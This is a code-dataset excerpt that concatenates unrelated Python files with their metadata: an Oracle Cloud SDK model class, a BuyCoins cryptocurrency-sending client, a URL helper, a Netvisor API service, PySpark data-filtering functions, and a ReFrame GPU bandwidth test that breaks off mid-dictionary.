Allowed values for this property are: "LINUX", "WINDOWS", 'UNKNOWN_ENUM_VALUE'.
Any unrecognized values returned by a service will be mapped to 'UNKNOWN_ENUM_VALUE'.
:type platform_type: str
:param version:
The value to assign to the version property of this ManagementAgentAggregationDimensions.
:type version: str
:param has_plugins:
The value to assign to the has_plugins property of this ManagementAgentAggregationDimensions.
:type has_plugins: bool
:param install_type:
The value to assign to the install_type property of this ManagementAgentAggregationDimensions.
Allowed values for this property are: "AGENT", "GATEWAY", 'UNKNOWN_ENUM_VALUE'.
Any unrecognized values returned by a service will be mapped to 'UNKNOWN_ENUM_VALUE'.
:type install_type: str
"""
self.swagger_types = {
'availability_status': 'str',
'platform_type': 'str',
'version': 'str',
'has_plugins': 'bool',
'install_type': 'str'
}
self.attribute_map = {
'availability_status': 'availabilityStatus',
'platform_type': 'platformType',
'version': 'version',
'has_plugins': 'hasPlugins',
'install_type': 'installType'
}
self._availability_status = None
self._platform_type = None
self._version = None
self._has_plugins = None
self._install_type = None
@property
def availability_status(self):
"""
Gets the availability_status of this ManagementAgentAggregationDimensions.
The availability status of managementAgent
Allowed values for this property are: "ACTIVE", "SILENT", "NOT_AVAILABLE", 'UNKNOWN_ENUM_VALUE'.
Any unrecognized values returned by a service will be mapped to 'UNKNOWN_ENUM_VALUE'.
:return: The availability_status of this ManagementAgentAggregationDimensions.
:rtype: str
"""
return self._availability_status
@availability_status.setter
def availability_status(self, availability_status):
"""
Sets the availability_status of this ManagementAgentAggregationDimensions.
The availability status of managementAgent
:param availability_status: The availability_status of this ManagementAgentAggregationDimensions.
:type: str
"""
allowed_values = ["ACTIVE", "SILENT", "NOT_AVAILABLE"]
if not value_allowed_none_or_none_sentinel(availability_status, allowed_values):
availability_status = 'UNKNOWN_ENUM_VALUE'
self._availability_status = availability_status
@property
def platform_type(self):
"""
Gets the platform_type of this ManagementAgentAggregationDimensions.
Platform Type
Allowed values for this property are: "LINUX", "WINDOWS", 'UNKNOWN_ENUM_VALUE'.
Any unrecognized values returned by a service will be mapped to 'UNKNOWN_ENUM_VALUE'.
:return: The platform_type of this ManagementAgentAggregationDimensions.
:rtype: str
"""
return self._platform_type
@platform_type.setter
def platform_type(self, platform_type):
"""
Sets the platform_type of this ManagementAgentAggregationDimensions.
Platform Type
:param platform_type: The platform_type of this ManagementAgentAggregationDimensions.
:type: str
"""
allowed_values = ["LINUX", "WINDOWS"]
if not value_allowed_none_or_none_sentinel(platform_type, allowed_values):
platform_type = 'UNKNOWN_ENUM_VALUE'
self._platform_type = platform_type
@property
def version(self):
"""
Gets the version of this ManagementAgentAggregationDimensions.
Agent image version
:return: The version of this ManagementAgentAggregationDimensions.
:rtype: str
"""
return self._version
@version.setter
def version(self, version):
"""
Sets the version of this ManagementAgentAggregationDimensions.
Agent image version
:param version: The version of this ManagementAgentAggregationDimensions.
:type: str
"""
self._version = version
@property
def has_plugins(self):
"""
Gets the has_plugins of this ManagementAgentAggregationDimensions.
Whether or not a managementAgent has at least one plugin
:return: The has_plugins of this ManagementAgentAggregationDimensions.
:rtype: bool
"""
return self._has_plugins
@has_plugins.setter
def has_plugins(self, has_plugins):
"""
Sets the has_plugins of this ManagementAgentAggregationDimensions.
Whether or not a managementAgent has at least one plugin
:param has_plugins: The has_plugins of this ManagementAgentAggregationDimensions.
:type: bool
"""
self._has_plugins = has_plugins
@property
def install_type(self):
"""
Gets the install_type of this ManagementAgentAggregationDimensions.
The install type, either AGENT or GATEWAY
Allowed values for this property are: "AGENT", "GATEWAY", 'UNKNOWN_ENUM_VALUE'.
Any unrecognized values returned by a service will be mapped to 'UNKNOWN_ENUM_VALUE'.
:return: The install_type of this ManagementAgentAggregationDimensions.
:rtype: str
"""
return self._install_type
@install_type.setter
def install_type(self, install_type):
"""
Sets the install_type of this ManagementAgentAggregationDimensions.
The install type, either AGENT or GATEWAY
:param install_type: The install_type of this ManagementAgentAggregationDimensions.
:type: str
"""
allowed_values = ["AGENT", "GATEWAY"]
if not value_allowed_none_or_none_sentinel(install_type, allowed_values):
install_type = 'UNKNOWN_ENUM_VALUE'
self._install_type = install_type
def __repr__(self):
return formatted_flat_dict(self)
def __eq__(self, other):
if other is None:
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
return not self == other
| en | 0.737054 | # coding: utf-8 # Copyright (c) 2016, 2021, Oracle and/or its affiliates. All rights reserved. # This software is dual-licensed to you under the Universal Permissive License (UPL) 1.0 as shown at https://oss.oracle.com/licenses/upl or Apache License 2.0 as shown at http://www.apache.org/licenses/LICENSE-2.0. You may choose either license. # noqa: F401 The Aggregation of Management Agent Dimensions #: A constant which can be used with the availability_status property of a ManagementAgentAggregationDimensions. #: This constant has a value of "ACTIVE" #: A constant which can be used with the availability_status property of a ManagementAgentAggregationDimensions. #: This constant has a value of "SILENT" #: A constant which can be used with the availability_status property of a ManagementAgentAggregationDimensions. #: This constant has a value of "NOT_AVAILABLE" #: A constant which can be used with the platform_type property of a ManagementAgentAggregationDimensions. #: This constant has a value of "LINUX" #: A constant which can be used with the platform_type property of a ManagementAgentAggregationDimensions. #: This constant has a value of "WINDOWS" #: A constant which can be used with the install_type property of a ManagementAgentAggregationDimensions. #: This constant has a value of "AGENT" #: A constant which can be used with the install_type property of a ManagementAgentAggregationDimensions. #: This constant has a value of "GATEWAY" Initializes a new ManagementAgentAggregationDimensions object with values from keyword arguments. The following keyword arguments are supported (corresponding to the getters/setters of this class): :param availability_status: The value to assign to the availability_status property of this ManagementAgentAggregationDimensions. Allowed values for this property are: "ACTIVE", "SILENT", "NOT_AVAILABLE", 'UNKNOWN_ENUM_VALUE'. Any unrecognized values returned by a service will be mapped to 'UNKNOWN_ENUM_VALUE'. :type availability_status: str :param platform_type: The value to assign to the platform_type property of this ManagementAgentAggregationDimensions. Allowed values for this property are: "LINUX", "WINDOWS", 'UNKNOWN_ENUM_VALUE'. Any unrecognized values returned by a service will be mapped to 'UNKNOWN_ENUM_VALUE'. :type platform_type: str :param version: The value to assign to the version property of this ManagementAgentAggregationDimensions. :type version: str :param has_plugins: The value to assign to the has_plugins property of this ManagementAgentAggregationDimensions. :type has_plugins: bool :param install_type: The value to assign to the install_type property of this ManagementAgentAggregationDimensions. Allowed values for this property are: "AGENT", "GATEWAY", 'UNKNOWN_ENUM_VALUE'. Any unrecognized values returned by a service will be mapped to 'UNKNOWN_ENUM_VALUE'. :type install_type: str Gets the availability_status of this ManagementAgentAggregationDimensions. The availability status of managementAgent Allowed values for this property are: "ACTIVE", "SILENT", "NOT_AVAILABLE", 'UNKNOWN_ENUM_VALUE'. Any unrecognized values returned by a service will be mapped to 'UNKNOWN_ENUM_VALUE'. :return: The availability_status of this ManagementAgentAggregationDimensions. :rtype: str Sets the availability_status of this ManagementAgentAggregationDimensions. The availability status of managementAgent :param availability_status: The availability_status of this ManagementAgentAggregationDimensions. :type: str Gets the platform_type of this ManagementAgentAggregationDimensions. Platform Type Allowed values for this property are: "LINUX", "WINDOWS", 'UNKNOWN_ENUM_VALUE'. Any unrecognized values returned by a service will be mapped to 'UNKNOWN_ENUM_VALUE'. :return: The platform_type of this ManagementAgentAggregationDimensions. :rtype: str Sets the platform_type of this ManagementAgentAggregationDimensions. Platform Type :param platform_type: The platform_type of this ManagementAgentAggregationDimensions. :type: str Gets the version of this ManagementAgentAggregationDimensions. Agent image version :return: The version of this ManagementAgentAggregationDimensions. :rtype: str Sets the version of this ManagementAgentAggregationDimensions. Agent image version :param version: The version of this ManagementAgentAggregationDimensions. :type: str Gets the has_plugins of this ManagementAgentAggregationDimensions. Whether or not a managementAgent has at least one plugin :return: The has_plugins of this ManagementAgentAggregationDimensions. :rtype: bool Sets the has_plugins of this ManagementAgentAggregationDimensions. Whether or not a managementAgent has at least one plugin :param has_plugins: The has_plugins of this ManagementAgentAggregationDimensions. :type: bool Gets the install_type of this ManagementAgentAggregationDimensions. The install type, either AGENT or GATEWAY Allowed values for this property are: "AGENT", "GATEWAY", 'UNKNOWN_ENUM_VALUE'. Any unrecognized values returned by a service will be mapped to 'UNKNOWN_ENUM_VALUE'. :return: The install_type of this ManagementAgentAggregationDimensions. :rtype: str Sets the install_type of this ManagementAgentAggregationDimensions. The install type, either AGENT or GATEWAY :param install_type: The install_type of this ManagementAgentAggregationDimensions. :type: str | 1.714254 | 2 |
py_buycoins/sending.py | Bashorun97/BuyCoins-Python-SDK | 1 | 8564 | from .gcore.queries import GetNetworkFee, GetBalance
from .gcore.mutations import SendCoin
from typing import List, Optional
from .exc import SendLimitError, InvalidClientObject
class Send:
def __init__(self, address: str, cryptocurrency: str, amount: float):
self.address = address
self.cryptocurrency = cryptocurrency
self.amount = amount
limits = {
"bitcoin": 1,
"ethereum": 50,
"litecoin": 50,
"nairatoken": 2000000
}
def execute(self, client):
try:
return client.execute(query=self.send())
except AttributeError:
raise InvalidClientObject("<BuyCoinsClient> object expected received {} instead".format(type(client)))
def get_network_fee(self, response_fields):
_price = GetNetworkFee()
return _price.queryObject(
response_fields=response_fields,
cryptocurrency=self.cryptocurrency, amount=self.amount
)
def check_limit(self):
if Send.limits[self.cryptocurrency.lower()] < self.amount:
return False
else:
return True
def send(self, response_fields):
if self.cryptocurrency.lower() in Send.limits.keys():
if self.check_limit(self.amount, self.cryptocurrency):
return SendCoin().Mutate(
cryptocurrency=self.cryptocurrency,
response_fields=response_fields,
amount=self.amount,
address=self.address
)
else:
raise SendLimitError("Maximum daily transaction amount exceeded")
def balance(self, response_fields: List):
return GetBalance.queryObject(response_fields=response_fields)
| from .gcore.queries import GetNetworkFee, GetBalance
from .gcore.mutations import SendCoin
from typing import List, Optional
from .exc import SendLimitError, InvalidClientObject
class Send:
def __init__(self, address: str, cryptocurrency: str, amount: float):
self.address = address
self.cryptocurrency = cryptocurrency
self.amount = amount
limits = {
"bitcoin": 1,
"ethereum": 50,
"litecoin": 50,
"nairatoken": 2000000
}
def execute(self, client):
try:
return client.execute(query=self.send())
except AttributeError:
raise InvalidClientObject("<BuyCoinsClient> object expected received {} instead".format(type(client)))
def get_network_fee(self, response_fields):
_price = GetNetworkFee()
return _price.queryObject(
response_fields=response_fields,
cryptocurrency=self.cryptocurrency, amount=self.amount
)
def check_limit(self):
if Send.limits[self.cryptocurrency.lower()] < self.amount:
return False
else:
return True
def send(self, response_fields):
if self.cryptocurrency.lower() in Send.limits.keys():
if self.check_limit(self.amount, self.cryptocurrency):
return SendCoin().Mutate(
cryptocurrency=self.cryptocurrency,
response_fields=response_fields,
amount=self.amount,
address=self.address
)
else:
raise SendLimitError("Maximum daily transaction amount exceeded")
def balance(self, response_fields: List):
return GetBalance.queryObject(response_fields=response_fields)
| none | 1 | 2.350477 | 2 |
|
snippet/example/python/url.py | yp2800/snippet | 94 | 8565 | <gh_stars>10-100
# -*- coding: utf-8 -*-
try:
from urlparse import urlparse, urlunsplit
except ImportError:
from urllib.parse import urlparse, urlunsplit
class URL(object):
DEFAULT_SCHEME = ["http", "https"]
def __init__(self, url, allowed_scheme=None):
self._url = url
self.url = urlparse(self._url)
self._scheme = allowed_scheme if allowed_scheme else self.DEFAULT_SCHEME
def geturl(self):
scheme = self.scheme if self.scheme else self.url.scheme
netloc = self.netloc if self.netloc else self.url.netloc
url = self.path if self.path else self.url.path
params = self.params if self.params else self.url.params
query = self.query if self.query else self.url.query
fragment = self.fragment if self.fragment else self.url.fragment
if params:
url = "%s;%s" % (url, params)
return urlunsplit((scheme, netloc, url, query, fragment))
def get_full_url(self, base=None):
return self.s_get_full_url(self, base)
@staticmethod
def s_get_full_url(url, base=None):
if not base:
if url.scheme in url._scheme:
return url.geturl()
return None
if not url.scheme:
url.scheme = base.scheme
if url.scheme not in url._scheme:
return None
if not url.netloc:
url.netloc = base.netloc
if len(url.path) == 1 and url.path == '/':
return None
if url.path[0] != '/':
path = base.path.split('/')[:-1]
path.append(url.path)
url.path = '/'.join(path)
return url.geturl()
def __getattr__(self, name):
if name == "path":
path = getattr(self.url, name)
if not path:
return '/'
return path
return getattr(self.url, name)
def __setattr__(self, name, value):
object.__setattr__(self, name, value)
def __repr__(self):
s = "URL(scheme='%s', netloc='%s', path='%s', params='%s', query='%s', fragment='%s')"
p = (self.scheme, self.netloc, self.path, self.params, self.query, self.fragment)
return s % p
| # -*- coding: utf-8 -*-
try:
from urlparse import urlparse, urlunsplit
except ImportError:
from urllib.parse import urlparse, urlunsplit
class URL(object):
DEFAULT_SCHEME = ["http", "https"]
def __init__(self, url, allowed_scheme=None):
self._url = url
self.url = urlparse(self._url)
self._scheme = allowed_scheme if allowed_scheme else self.DEFAULT_SCHEME
def geturl(self):
scheme = self.scheme if self.scheme else self.url.scheme
netloc = self.netloc if self.netloc else self.url.netloc
url = self.path if self.path else self.url.path
params = self.params if self.params else self.url.params
query = self.query if self.query else self.url.query
fragment = self.fragment if self.fragment else self.url.fragment
if params:
url = "%s;%s" % (url, params)
return urlunsplit((scheme, netloc, url, query, fragment))
def get_full_url(self, base=None):
return self.s_get_full_url(self, base)
@staticmethod
def s_get_full_url(url, base=None):
if not base:
if url.scheme in url._scheme:
return url.geturl()
return None
if not url.scheme:
url.scheme = base.scheme
if url.scheme not in url._scheme:
return None
if not url.netloc:
url.netloc = base.netloc
if len(url.path) == 1 and url.path == '/':
return None
if url.path[0] != '/':
path = base.path.split('/')[:-1]
path.append(url.path)
url.path = '/'.join(path)
return url.geturl()
def __getattr__(self, name):
if name == "path":
path = getattr(self.url, name)
if not path:
return '/'
return path
return getattr(self.url, name)
def __setattr__(self, name, value):
object.__setattr__(self, name, value)
def __repr__(self):
s = "URL(scheme='%s', netloc='%s', path='%s', params='%s', query='%s', fragment='%s')"
p = (self.scheme, self.netloc, self.path, self.params, self.query, self.fragment)
return s % p | en | 0.769321 | # -*- coding: utf-8 -*- | 2.976561 | 3 |
netvisor_api_client/services/dimension.py | tristen-tooming/netvisor-api-client | 0 | 8566 | from .base import Service
from ..requests.dimension import CreateDimensionsRequest, DimensionsListRequest
class DimensionService(Service):
def create(self, data):
request = CreateDimensionsRequest(
self.client,
params={'method': 'add'},
data=data
)
return request.make_request()
def list(self, showhidden=None):
request = DimensionsListRequest(self.client,
params={'showhidden': showhidden})
return request.make_request() | from .base import Service
from ..requests.dimension import CreateDimensionsRequest, DimensionsListRequest
class DimensionService(Service):
def create(self, data):
request = CreateDimensionsRequest(
self.client,
params={'method': 'add'},
data=data
)
return request.make_request()
def list(self, showhidden=None):
request = DimensionsListRequest(self.client,
params={'showhidden': showhidden})
return request.make_request() | none | 1 | 2.619974 | 3 |
|
cishouseholds/filter.py | ONS-SST/cis_households | 0 | 8567 | <gh_stars>0
from typing import List
from typing import Union
from pyspark.sql import DataFrame
from pyspark.sql import functions as F
from pyspark.sql.window import Window
def filter_all_not_null(df: DataFrame, reference_columns: List[str]) -> DataFrame:
"""
Filter rows which have NULL values in all the specified columns.
From households_aggregate_processes.xlsx, filter number 2.
Parameters
----------
df
reference_columns
Columns to check for missing values in, all
must be missing for the record to be dropped.
"""
return df.na.drop(how="all", subset=reference_columns)
def filter_duplicates_by_time_and_threshold(
df: DataFrame,
first_reference_column: str,
second_reference_column: str,
third_reference_column: str,
fourth_reference_column: str,
time_threshold: float = 1.5,
float_threshold: float = 0.00001,
) -> DataFrame:
"""
Drop duplicates based on two identitical column values if third and fourth column and not both within
a threshold difference from the first duplicate record.
From households_aggregate_processes.xlsx, filter number 4.
Parameters
----------
df
first_reference_column
First column with duplicate value
second_reference_column
Second column with duplicate value
third_reference_column
Column used for time based threshold difference, timestamp
fourth_reference_column
Column used for numeric based threshold difference, float
"""
window = Window.partitionBy(first_reference_column, second_reference_column).orderBy(third_reference_column)
df = df.withColumn("duplicate_id", F.row_number().over(window))
df = df.withColumn(
"within_time_threshold",
(
F.abs(
F.first(third_reference_column).over(window).cast("long") - F.col(third_reference_column).cast("long")
)
/ (60 * 60)
)
< time_threshold,
)
df = df.withColumn(
"within_float_threshold",
F.abs(F.first(fourth_reference_column).over(window) - F.col(fourth_reference_column)) < float_threshold,
)
df = df.filter((F.col("duplicate_id") == 1) | ~(F.col("within_time_threshold") & (F.col("within_float_threshold"))))
return df.drop("duplicate_id", "within_time_threshold", "within_float_threshold")
def filter_by_cq_diff(
df: DataFrame, comparing_column: str, ordering_column: str, tolerance: float = 0.00001
) -> DataFrame:
"""
This function works out what columns have a float value difference less than 10-^5 or 0.00001
(or any other tolerance value inputed) given all the other columns are the same and
considers it to be the same dropping or deleting the repeated values and only keeping one entry.
Parameters
----------
df
comparing_column
ordering_column
tolerance
"""
column_list = df.columns
column_list.remove(comparing_column)
windowSpec = Window.partitionBy(column_list).orderBy(ordering_column)
df = df.withColumn("first_value_in_duplicates", F.first(comparing_column).over(windowSpec))
df = df.withColumn(
"duplicates_first_record", F.abs(F.col("first_value_in_duplicates") - F.col(comparing_column)) < tolerance
)
difference_window = Window.partitionBy(column_list + ["duplicates_first_record"]).orderBy(ordering_column)
df = df.withColumn("duplicate_number", F.row_number().over(difference_window))
df = df.filter(~(F.col("duplicates_first_record") & (F.col("duplicate_number") != 1)))
df = df.drop("first_value_in_duplicates", "duplicates_first_record", "duplicate_number")
return df
def assign_date_interval_and_flag(
df: DataFrame,
column_name_inside_interval: str,
column_name_time_interval: str,
start_datetime_reference_column: str,
end_datetime_reference_column: str,
lower_interval: Union[int, float],
upper_interval: Union[int, float],
interval_format: str = "hours",
) -> DataFrame:
"""
This function gives the time interval in either hours (by default) or days
in a column by given two date columns and says whether it is inside and
upper and lower interval. If the difference of dates is within the upper and
lower time intervals, the function will output None and an integer 1 if the
difference in dates are outside of those intervals.
Parameters
----------
df
column_name_inside_interval
Name of the column that returns whether the difference in dates are
within the upper/lower limits if within, it will return None, if outside
will return an integer 1.
column_name_time_interval
Name of the column that returns the difference between start and end
date and adds at the end of the column name whether it is in hours or
days
start_datetime_reference_column
Earliest date in string format yyyy-mm-dd hh:mm:ss.
end_datetime_reference_column
Latest date in string format yyyy-mm-dd hh:mm:ss.
lower_interval
Marks how much NEGATIVE time difference can have between
end_datetime_reference_column and start_datetime_reference_column.
Meaning how the end_datetime_reference_column can be earlier than
start_datetime_reference_column
upper_interval
Marks how much POSITIVE time difference can have between
end_datetime_reference_column and start_datetime_reference_column
interval_format
By default will be a string called 'hours' if upper and lower
intervals are input as days, define interval_format to 'days'.
These are the only two possible formats.
Notes
-----
Lower_interval should be a negative value if start_datetime_reference_column
is after end_datetime_reference_column."""
# by default, Hours but if days, apply change factor
if interval_format == "hours": # to convert hours to seconds
conversion_factor = 3600 # 1h has 60s*60min seconds = 3600 seconds
elif interval_format == "days":
conversion_factor = 86400 # 1 day has 60s*60min*24h seconds = 86400 seconds
column_name_time_interval = column_name_time_interval + "_" + interval_format
# FORMULA: (end_datetime_reference_column - start_datetime_reference_column) in
# seconds/conversion_factor in seconds
df = df.withColumn(
column_name_time_interval,
(
F.to_timestamp(F.col(end_datetime_reference_column)).cast("long")
- F.to_timestamp(F.col(start_datetime_reference_column)).cast("long")
)
/ conversion_factor, # 1 day has 60s*60min*24h seconds = 86400 seconds
)
return df.withColumn(
column_name_inside_interval,
F.when(~F.col(column_name_time_interval).between(lower_interval, upper_interval), 1).otherwise(None),
)
def file_exclude(df: DataFrame, source_file_col: str, files_to_exclude: list):
"""
Function to exclude specific files from pipeline processing
Parameters
--------
df
source_file_column = Column in input dataframe which contains the source file
files_to_exclude = List of files to exclude (feed in from config)
"""
for item in files_to_exclude:
df = df.filter(~F.col(source_file_col).isin(item))
return df
| from typing import List
from typing import Union
from pyspark.sql import DataFrame
from pyspark.sql import functions as F
from pyspark.sql.window import Window
def filter_all_not_null(df: DataFrame, reference_columns: List[str]) -> DataFrame:
"""
Filter rows which have NULL values in all the specified columns.
From households_aggregate_processes.xlsx, filter number 2.
Parameters
----------
df
reference_columns
Columns to check for missing values in, all
must be missing for the record to be dropped.
"""
return df.na.drop(how="all", subset=reference_columns)
def filter_duplicates_by_time_and_threshold(
df: DataFrame,
first_reference_column: str,
second_reference_column: str,
third_reference_column: str,
fourth_reference_column: str,
time_threshold: float = 1.5,
float_threshold: float = 0.00001,
) -> DataFrame:
"""
Drop duplicates based on two identitical column values if third and fourth column and not both within
a threshold difference from the first duplicate record.
From households_aggregate_processes.xlsx, filter number 4.
Parameters
----------
df
first_reference_column
First column with duplicate value
second_reference_column
Second column with duplicate value
third_reference_column
Column used for time based threshold difference, timestamp
fourth_reference_column
Column used for numeric based threshold difference, float
"""
window = Window.partitionBy(first_reference_column, second_reference_column).orderBy(third_reference_column)
df = df.withColumn("duplicate_id", F.row_number().over(window))
df = df.withColumn(
"within_time_threshold",
(
F.abs(
F.first(third_reference_column).over(window).cast("long") - F.col(third_reference_column).cast("long")
)
/ (60 * 60)
)
< time_threshold,
)
df = df.withColumn(
"within_float_threshold",
F.abs(F.first(fourth_reference_column).over(window) - F.col(fourth_reference_column)) < float_threshold,
)
df = df.filter((F.col("duplicate_id") == 1) | ~(F.col("within_time_threshold") & (F.col("within_float_threshold"))))
return df.drop("duplicate_id", "within_time_threshold", "within_float_threshold")
def filter_by_cq_diff(
df: DataFrame, comparing_column: str, ordering_column: str, tolerance: float = 0.00001
) -> DataFrame:
"""
This function works out what columns have a float value difference less than 10-^5 or 0.00001
(or any other tolerance value inputed) given all the other columns are the same and
considers it to be the same dropping or deleting the repeated values and only keeping one entry.
Parameters
----------
df
comparing_column
ordering_column
tolerance
"""
column_list = df.columns
column_list.remove(comparing_column)
windowSpec = Window.partitionBy(column_list).orderBy(ordering_column)
df = df.withColumn("first_value_in_duplicates", F.first(comparing_column).over(windowSpec))
df = df.withColumn(
"duplicates_first_record", F.abs(F.col("first_value_in_duplicates") - F.col(comparing_column)) < tolerance
)
difference_window = Window.partitionBy(column_list + ["duplicates_first_record"]).orderBy(ordering_column)
df = df.withColumn("duplicate_number", F.row_number().over(difference_window))
df = df.filter(~(F.col("duplicates_first_record") & (F.col("duplicate_number") != 1)))
df = df.drop("first_value_in_duplicates", "duplicates_first_record", "duplicate_number")
return df
def assign_date_interval_and_flag(
df: DataFrame,
column_name_inside_interval: str,
column_name_time_interval: str,
start_datetime_reference_column: str,
end_datetime_reference_column: str,
lower_interval: Union[int, float],
upper_interval: Union[int, float],
interval_format: str = "hours",
) -> DataFrame:
"""
This function gives the time interval in either hours (by default) or days
in a column by given two date columns and says whether it is inside and
upper and lower interval. If the difference of dates is within the upper and
lower time intervals, the function will output None and an integer 1 if the
difference in dates are outside of those intervals.
Parameters
----------
df
column_name_inside_interval
Name of the column that returns whether the difference in dates are
within the upper/lower limits if within, it will return None, if outside
will return an integer 1.
column_name_time_interval
Name of the column that returns the difference between start and end
date and adds at the end of the column name whether it is in hours or
days
start_datetime_reference_column
Earliest date in string format yyyy-mm-dd hh:mm:ss.
end_datetime_reference_column
Latest date in string format yyyy-mm-dd hh:mm:ss.
lower_interval
Marks how much NEGATIVE time difference can have between
end_datetime_reference_column and start_datetime_reference_column.
Meaning how the end_datetime_reference_column can be earlier than
start_datetime_reference_column
upper_interval
Marks how much POSITIVE time difference can have between
end_datetime_reference_column and start_datetime_reference_column
interval_format
By default will be a string called 'hours' if upper and lower
intervals are input as days, define interval_format to 'days'.
These are the only two possible formats.
Notes
-----
Lower_interval should be a negative value if start_datetime_reference_column
is after end_datetime_reference_column."""
# by default, Hours but if days, apply change factor
if interval_format == "hours": # to convert hours to seconds
conversion_factor = 3600 # 1h has 60s*60min seconds = 3600 seconds
elif interval_format == "days":
conversion_factor = 86400 # 1 day has 60s*60min*24h seconds = 86400 seconds
column_name_time_interval = column_name_time_interval + "_" + interval_format
# FORMULA: (end_datetime_reference_column - start_datetime_reference_column) in
# seconds/conversion_factor in seconds
df = df.withColumn(
column_name_time_interval,
(
F.to_timestamp(F.col(end_datetime_reference_column)).cast("long")
- F.to_timestamp(F.col(start_datetime_reference_column)).cast("long")
)
/ conversion_factor, # 1 day has 60s*60min*24h seconds = 86400 seconds
)
return df.withColumn(
column_name_inside_interval,
F.when(~F.col(column_name_time_interval).between(lower_interval, upper_interval), 1).otherwise(None),
)
def file_exclude(df: DataFrame, source_file_col: str, files_to_exclude: list):
"""
Function to exclude specific files from pipeline processing
Parameters
--------
df
source_file_column = Column in input dataframe which contains the source file
files_to_exclude = List of files to exclude (feed in from config)
"""
for item in files_to_exclude:
df = df.filter(~F.col(source_file_col).isin(item))
return df | en | 0.709229 | Filter rows which have NULL values in all the specified columns. From households_aggregate_processes.xlsx, filter number 2. Parameters ---------- df reference_columns Columns to check for missing values in, all must be missing for the record to be dropped. Drop duplicates based on two identitical column values if third and fourth column and not both within a threshold difference from the first duplicate record. From households_aggregate_processes.xlsx, filter number 4. Parameters ---------- df first_reference_column First column with duplicate value second_reference_column Second column with duplicate value third_reference_column Column used for time based threshold difference, timestamp fourth_reference_column Column used for numeric based threshold difference, float This function works out what columns have a float value difference less than 10-^5 or 0.00001 (or any other tolerance value inputed) given all the other columns are the same and considers it to be the same dropping or deleting the repeated values and only keeping one entry. Parameters ---------- df comparing_column ordering_column tolerance This function gives the time interval in either hours (by default) or days in a column by given two date columns and says whether it is inside and upper and lower interval. If the difference of dates is within the upper and lower time intervals, the function will output None and an integer 1 if the difference in dates are outside of those intervals. Parameters ---------- df column_name_inside_interval Name of the column that returns whether the difference in dates are within the upper/lower limits if within, it will return None, if outside will return an integer 1. column_name_time_interval Name of the column that returns the difference between start and end date and adds at the end of the column name whether it is in hours or days start_datetime_reference_column Earliest date in string format yyyy-mm-dd hh:mm:ss. end_datetime_reference_column Latest date in string format yyyy-mm-dd hh:mm:ss. lower_interval Marks how much NEGATIVE time difference can have between end_datetime_reference_column and start_datetime_reference_column. Meaning how the end_datetime_reference_column can be earlier than start_datetime_reference_column upper_interval Marks how much POSITIVE time difference can have between end_datetime_reference_column and start_datetime_reference_column interval_format By default will be a string called 'hours' if upper and lower intervals are input as days, define interval_format to 'days'. These are the only two possible formats. Notes ----- Lower_interval should be a negative value if start_datetime_reference_column is after end_datetime_reference_column. # by default, Hours but if days, apply change factor # to convert hours to seconds # 1h has 60s*60min seconds = 3600 seconds # 1 day has 60s*60min*24h seconds = 86400 seconds # FORMULA: (end_datetime_reference_column - start_datetime_reference_column) in # seconds/conversion_factor in seconds # 1 day has 60s*60min*24h seconds = 86400 seconds Function to exclude specific files from pipeline processing Parameters -------- df source_file_column = Column in input dataframe which contains the source file files_to_exclude = List of files to exclude (feed in from config) | 3.358688 | 3 |
cscs-checks/cuda/multi_gpu.py | hpc-unibe-ch/reframe | 0 | 8568 | <reponame>hpc-unibe-ch/reframe<gh_stars>0
# Copyright 2016-2020 Swiss National Supercomputing Centre (CSCS/ETH Zurich)
# ReFrame Project Developers. See the top-level LICENSE file for details.
#
# SPDX-License-Identifier: BSD-3-Clause
import os
import reframe.utility.sanity as sn
import reframe as rfm
@rfm.required_version('>=2.16-dev0')
@rfm.simple_test
class GpuBandwidthCheck(rfm.RegressionTest):
def __init__(self):
self.valid_systems = ['kesch:cn', 'daint:gpu', 'dom:gpu', 'tiger:gpu',
'arolla:cn', 'tsa:cn']
self.valid_prog_environs = ['PrgEnv-gnu']
if self.current_system.name in ['arolla', 'kesch', 'tsa']:
self.valid_prog_environs = ['PrgEnv-gnu-nompi']
self.exclusive_access = True
self.sourcesdir = os.path.join(
self.current_system.resourcesdir, 'CUDA', 'essentials'
)
self.build_system = 'SingleSource'
# Set nvcc flags
nvidia_sm = '60'
if self.current_system.name == 'kesch':
nvidia_sm = '37'
elif self.current_system.name in ['arolla', 'tsa']:
nvidia_sm = '70'
self.build_system.cxxflags = ['-I.', '-m64', '-arch=sm_%s' % nvidia_sm]
self.sourcepath = 'bandwidthtestflex.cu'
self.executable = 'gpu_bandwidth_check.x'
# Perform a single bandwidth test with a buffer size of 1024MB
self.min_buffer_size = 1073741824
self.max_buffer_size = 1073741824
self.executable_opts = ['device', 'all', '--mode=range',
'--start=%d' % self.min_buffer_size,
'--increment=%d' % self.min_buffer_size,
'--end=%d' % self.max_buffer_size, '--csv']
self.num_tasks = 0
self.num_tasks_per_node = 1
if self.current_system.name in ['daint', 'dom', 'tiger']:
self.modules = ['craype-accel-nvidia60']
self.num_gpus_per_node = 1
elif self.current_system.name == 'kesch':
self.modules = ['cudatoolkit/8.0.61']
self.num_gpus_per_node = 8
elif self.current_system.name in ['arolla', 'tsa']:
self.modules = ['cuda/10.1.243']
self.num_gpus_per_node = 8
# perf_patterns and reference will be set by the sanity check function
self.sanity_patterns = self.do_sanity_check()
self.perf_patterns = {}
self.reference = {}
self.__bwref = {
# FIXME: reference values for Arolla and Tsa need to be updated
# (sanity check fails if they are not defined)
'arolla:cn:h2d': (7583, -0.1, None, 'MB/s'),
'arolla:cn:d2h': (7584, -0.1, None, 'MB/s'),
'arolla:cn:d2d': (137408, -0.1, None, 'MB/s'),
'daint:gpu:h2d': (11881, -0.1, None, 'MB/s'),
'daint:gpu:d2h': (12571, -0.1, None, 'MB/s'),
'daint:gpu:d2d': (499000, -0.1, None, 'MB/s'),
'dom:gpu:h2d': (11881, -0.1, None, 'MB/s'),
'dom:gpu:d2h': (12571, -0.1, None, 'MB/s'),
'dom:gpu:d2d': (499000, -0.1, None, 'MB/s'),
'kesch:cn:h2d': (7583, -0.1, None, 'MB/s'),
'kesch:cn:d2h': (7584, -0.1, None, 'MB/s'),
'kesch:cn:d2d': (137408, -0.1, None, 'MB/s'),
'tiger:gpu:h2d': (0, None, None, 'MB/s'),
'tiger:gpu:d2h': (0, None, None, 'MB/s'),
'tiger:gpu:d2d': (0, None, None, 'MB/s'),
'tsa:cn:h2d': (7583, -0.1, None, 'MB/s'),
'tsa:cn:d2h': (7584, -0.1, None, 'MB/s'),
'tsa:cn:d2d': (137408, -0.1, None, 'MB/s'),
